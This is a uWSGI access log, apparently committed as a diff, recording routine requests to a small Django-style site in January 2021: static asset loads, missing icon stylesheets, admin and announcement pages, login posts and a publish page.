+[pid: 18965|app: -1|req: -1/753] 219.228.146.62 () {38 vars in 756 bytes} [Sat Jan 9 01:55:26 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/754] 219.228.146.62 () {38 vars in 737 bytes} [Sat Jan 9 01:55:26 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/755] 219.228.146.62 () {38 vars in 762 bytes} [Sat Jan 9 01:55:26 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/756] 219.228.146.62 () {38 vars in 735 bytes} [Sat Jan 9 01:55:26 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/757] 219.228.146.62 () {38 vars in 753 bytes} [Sat Jan 9 01:55:26 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/758] 219.228.146.62 () {38 vars in 751 bytes} [Sat Jan 9 01:55:26 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/759] 219.228.146.62 () {38 vars in 743 bytes} [Sat Jan 9 01:55:26 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/760] 219.228.146.62 () {38 vars in 803 bytes} [Sat Jan 9 01:55:29 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/761] 219.228.146.62 () {38 vars in 772 bytes} [Sat Jan 9 01:55:29 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: 0|req: 537/762] 219.228.146.62 () {40 vars in 864 bytes} [Sat Jan 9 01:55:34 2021] GET /my-admin => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 538/763] 219.228.146.62 () {40 vars in 866 bytes} [Sat Jan 9 01:55:34 2021] GET /my-admin/ => generated 5354 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /favicon.ico
+[pid: 18965|app: 0|req: 539/764] 219.228.146.62 () {38 vars in 759 bytes} [Sat Jan 9 01:55:34 2021] GET /favicon.ico => generated 3397 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 540/765] 219.228.146.62 () {48 vars in 967 bytes} [Sat Jan 9 01:55:43 2021] POST /my-admin/ => generated 27 bytes in 4 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 541/766] 219.228.146.62 () {40 vars in 921 bytes} [Sat Jan 9 01:55:43 2021] GET /admin-home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 180 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 542/767] 219.228.146.62 () {40 vars in 923 bytes} [Sat Jan 9 01:55:44 2021] GET /admin-home/ => generated 9586 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 18965|app: -1|req: -1/768] 219.228.146.62 () {38 vars in 868 bytes} [Sat Jan 9 01:55:44 2021] GET /static/assets/plugins/bootstrap/css/bootstrap.min.css => generated 150996 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/769] 219.228.146.62 () {38 vars in 802 bytes} [Sat Jan 9 01:55:44 2021] GET /static/css/style.css => generated 118751 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/770] 219.228.146.62 () {38 vars in 814 bytes} [Sat Jan 9 01:55:44 2021] GET /static/css/colors/blue.css => generated 3905 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/771] 219.228.146.62 () {38 vars in 831 bytes} [Sat Jan 9 01:55:44 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/772] 219.228.146.62 () {38 vars in 843 bytes} [Sat Jan 9 01:55:44 2021] GET /static/assets/plugins/bootstrap/js/tether.min.js => generated 24900 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/773] 219.228.146.62 () {38 vars in 849 bytes} [Sat Jan 9 01:55:44 2021] GET /static/assets/plugins/bootstrap/js/bootstrap.min.js => generated 46653 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/774] 219.228.146.62 () {38 vars in 807 bytes} [Sat Jan 9 01:55:44 2021] GET /static/js/jquery.slimscroll.js => generated 4475 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/775] 219.228.146.62 () {38 vars in 783 bytes} [Sat Jan 9 01:55:44 2021] GET /static/js/waves.js => generated 4237 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 18965|app: 0|req: 543/776] 219.228.146.62 () {38 vars in 881 bytes} [Sat Jan 9 01:55:45 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 18965|app: 0|req: 544/777] 219.228.146.62 () {38 vars in 893 bytes} [Sat Jan 9 01:55:45 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 18965|app: 0|req: 545/778] 219.228.146.62 () {38 vars in 885 bytes} [Sat Jan 9 01:55:46 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 18965|app: 0|req: 546/779] 219.228.146.62 () {38 vars in 849 bytes} [Sat Jan 9 01:55:46 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 18965|app: 0|req: 547/780] 219.228.146.62 () {38 vars in 869 bytes} [Sat Jan 9 01:55:46 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 18965|app: 0|req: 548/781] 219.228.146.62 () {38 vars in 869 bytes} [Sat Jan 9 01:55:46 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 18965|app: 0|req: 549/782] 219.228.146.62 () {38 vars in 925 bytes} [Sat Jan 9 01:55:46 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 18965|app: 0|req: 550/783] 219.228.146.62 () {38 vars in 817 bytes} [Sat Jan 9 01:55:46 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 18965|app: 0|req: 551/784] 219.228.146.62 () {38 vars in 815 bytes} [Sat Jan 9 01:55:46 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: -1|req: -1/785] 219.228.146.62 () {38 vars in 795 bytes} [Sat Jan 9 01:55:46 2021] GET /static/js/sidebarmenu.js => generated 10298 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/786] 219.228.146.62 () {38 vars in 871 bytes} [Sat Jan 9 01:55:46 2021] GET /static/assets/plugins/sticky-kit-master/dist/sticky-kit.min.js => generated 3268 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/787] 219.228.146.62 () {38 vars in 793 bytes} [Sat Jan 9 01:55:46 2021] GET /static/js/custom.min.js => generated 1436 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/788] 219.228.146.62 () {38 vars in 867 bytes} [Sat Jan 9 01:55:46 2021] GET /static/assets/plugins/styleswitcher/jQuery.style.switcher.js => generated 1433 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: 0|req: 552/789] 219.228.146.62 () {40 vars in 927 bytes} [Sat Jan 9 01:55:55 2021] GET /announcement => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 182 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 553/790] 219.228.146.62 () {40 vars in 929 bytes} [Sat Jan 9 01:55:55 2021] GET /announcement/ => generated 8250 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 18965|app: 0|req: 554/791] 219.228.146.62 () {38 vars in 885 bytes} [Sat Jan 9 01:55:55 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 18965|app: 0|req: 555/792] 219.228.146.62 () {38 vars in 849 bytes} [Sat Jan 9 01:55:55 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 18965|app: 0|req: 556/793] 219.228.146.62 () {38 vars in 817 bytes} [Sat Jan 9 01:55:55 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 18965|app: 0|req: 557/794] 219.228.146.62 () {38 vars in 815 bytes} [Sat Jan 9 01:55:55 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 18965|app: 0|req: 558/795] 219.228.146.62 () {38 vars in 881 bytes} [Sat Jan 9 01:55:55 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 18965|app: 0|req: 559/796] 219.228.146.62 () {38 vars in 893 bytes} [Sat Jan 9 01:55:55 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 18965|app: 0|req: 560/797] 219.228.146.62 () {38 vars in 869 bytes} [Sat Jan 9 01:55:55 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 18965|app: 0|req: 561/798] 219.228.146.62 () {38 vars in 869 bytes} [Sat Jan 9 01:55:55 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 18965|app: 0|req: 562/799] 219.228.146.62 () {38 vars in 925 bytes} [Sat Jan 9 01:55:55 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 563/800] 219.228.146.62 () {40 vars in 927 bytes} [Sat Jan 9 01:55:57 2021] GET /kind-manage => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 564/801] 219.228.146.62 () {40 vars in 929 bytes} [Sat Jan 9 01:55:57 2021] GET /kind-manage/ => generated 12023 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 18965|app: 0|req: 565/802] 219.228.146.62 () {38 vars in 893 bytes} [Sat Jan 9 01:55:58 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 18965|app: 0|req: 566/803] 219.228.146.62 () {38 vars in 881 bytes} [Sat Jan 9 01:55:58 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 18965|app: 0|req: 567/804] 219.228.146.62 () {38 vars in 885 bytes} [Sat Jan 9 01:55:58 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 18965|app: 0|req: 568/805] 219.228.146.62 () {38 vars in 869 bytes} [Sat Jan 9 01:55:58 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 18965|app: 0|req: 569/806] 219.228.146.62 () {38 vars in 849 bytes} [Sat Jan 9 01:55:58 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 18965|app: 0|req: 570/807] 219.228.146.62 () {38 vars in 817 bytes} [Sat Jan 9 01:55:58 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 18965|app: 0|req: 571/808] 219.228.146.62 () {38 vars in 869 bytes} [Sat Jan 9 01:55:58 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 18965|app: 0|req: 572/809] 219.228.146.62 () {38 vars in 925 bytes} [Sat Jan 9 01:55:58 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 18965|app: 0|req: 573/810] 219.228.146.62 () {38 vars in 815 bytes} [Sat Jan 9 01:55:58 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 574/811] 219.228.146.62 () {40 vars in 930 bytes} [Sat Jan 9 01:55:59 2021] GET /announcement/ => generated 8250 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 18965|app: 0|req: 575/812] 219.228.146.62 () {38 vars in 881 bytes} [Sat Jan 9 01:55:59 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 18965|app: 0|req: 576/813] 219.228.146.62 () {38 vars in 893 bytes} [Sat Jan 9 01:55:59 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 18965|app: 0|req: 577/814] 219.228.146.62 () {38 vars in 885 bytes} [Sat Jan 9 01:55:59 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 18965|app: 0|req: 578/815] 219.228.146.62 () {38 vars in 869 bytes} [Sat Jan 9 01:55:59 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 18965|app: 0|req: 579/816] 219.228.146.62 () {38 vars in 849 bytes} [Sat Jan 9 01:55:59 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 18965|app: 0|req: 580/817] 219.228.146.62 () {38 vars in 817 bytes} [Sat Jan 9 01:55:59 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 18965|app: 0|req: 581/818] 219.228.146.62 () {38 vars in 869 bytes} [Sat Jan 9 01:55:59 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 18965|app: 0|req: 582/819] 219.228.146.62 () {38 vars in 925 bytes} [Sat Jan 9 01:55:59 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 18965|app: 0|req: 583/820] 219.228.146.62 () {38 vars in 815 bytes} [Sat Jan 9 01:55:59 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 584/821] 219.228.146.62 () {40 vars in 929 bytes} [Sat Jan 9 01:56:00 2021] GET /kind-manage/ => generated 12023 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 18965|app: 0|req: 585/822] 219.228.146.62 () {38 vars in 885 bytes} [Sat Jan 9 01:56:01 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 18965|app: 0|req: 586/823] 219.228.146.62 () {38 vars in 881 bytes} [Sat Jan 9 01:56:01 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 18965|app: 0|req: 587/824] 219.228.146.62 () {38 vars in 893 bytes} [Sat Jan 9 01:56:01 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 18965|app: 0|req: 588/825] 219.228.146.62 () {38 vars in 849 bytes} [Sat Jan 9 01:56:01 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 18965|app: 0|req: 589/826] 219.228.146.62 () {38 vars in 869 bytes} [Sat Jan 9 01:56:01 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 18965|app: 0|req: 590/827] 219.228.146.62 () {38 vars in 869 bytes} [Sat Jan 9 01:56:01 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 18965|app: 0|req: 591/828] 219.228.146.62 () {38 vars in 925 bytes} [Sat Jan 9 01:56:01 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 18965|app: 0|req: 592/829] 219.228.146.62 () {38 vars in 817 bytes} [Sat Jan 9 01:56:01 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 18965|app: 0|req: 593/830] 219.228.146.62 () {38 vars in 815 bytes} [Sat Jan 9 01:56:01 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 594/831] 219.228.146.62 () {40 vars in 910 bytes} [Sat Jan 9 01:56:12 2021] GET /my-admin/ => generated 5354 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 595/832] 219.228.146.62 () {40 vars in 911 bytes} [Sat Jan 9 01:56:22 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 596/833] 219.228.146.62 () {40 vars in 913 bytes} [Sat Jan 9 01:56:22 2021] GET /login/ => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 597/834] 219.228.146.62 () {48 vars in 1002 bytes} [Sat Jan 9 01:56:29 2021] POST /login/ => generated 82 bytes in 4 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 598/835] 219.228.146.62 () {48 vars in 1002 bytes} [Sat Jan 9 01:56:39 2021] POST /login/ => generated 82 bytes in 3 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 599/836] 219.228.146.62 () {48 vars in 1002 bytes} [Sat Jan 9 01:56:46 2021] POST /login/ => generated 27 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 600/837] 219.228.146.62 () {40 vars in 906 bytes} [Sat Jan 9 01:56:46 2021] GET /home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 601/838] 219.228.146.62 () {40 vars in 908 bytes} [Sat Jan 9 01:56:46 2021] GET /home/ => generated 8644 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 602/839] 219.228.146.62 () {40 vars in 910 bytes} [Sat Jan 9 01:56:51 2021] GET /publish => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 177 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 603/840] 219.228.146.62 () {40 vars in 911 bytes} [Sat Jan 9 01:56:51 2021] GET /publish/ => generated 5083 bytes in 4 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 18965|app: -1|req: -1/841] 219.228.146.62 () {38 vars in 853 bytes} [Sat Jan 9 01:56:52 2021] GET /static/img/back-top-btn.png => generated 1790 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: 0|req: 604/842] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 02:13:23 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 605/843] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 02:51:04 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 606/844] 117.100.100.38 () {40 vars in 1026 bytes} [Sat Jan 9 03:13:37 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: -1|req: -1/845] 117.100.100.38 () {40 vars in 981 bytes} [Sat Jan 9 03:13:37 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/846] 117.100.100.38 () {40 vars in 959 bytes} [Sat Jan 9 03:13:37 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/847] 117.100.100.38 () {40 vars in 963 bytes} [Sat Jan 9 03:13:37 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/848] 117.100.100.38 () {40 vars in 961 bytes} [Sat Jan 9 03:13:37 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/849] 117.100.100.38 () {40 vars in 967 bytes} [Sat Jan 9 03:13:37 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/850] 117.100.100.38 () {40 vars in 942 bytes} [Sat Jan 9 03:13:37 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/851] 117.100.100.38 () {40 vars in 958 bytes} [Sat Jan 9 03:13:37 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/852] 117.100.100.38 () {40 vars in 940 bytes} [Sat Jan 9 03:13:37 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/853] 117.100.100.38 () {40 vars in 956 bytes} [Sat Jan 9 03:13:38 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
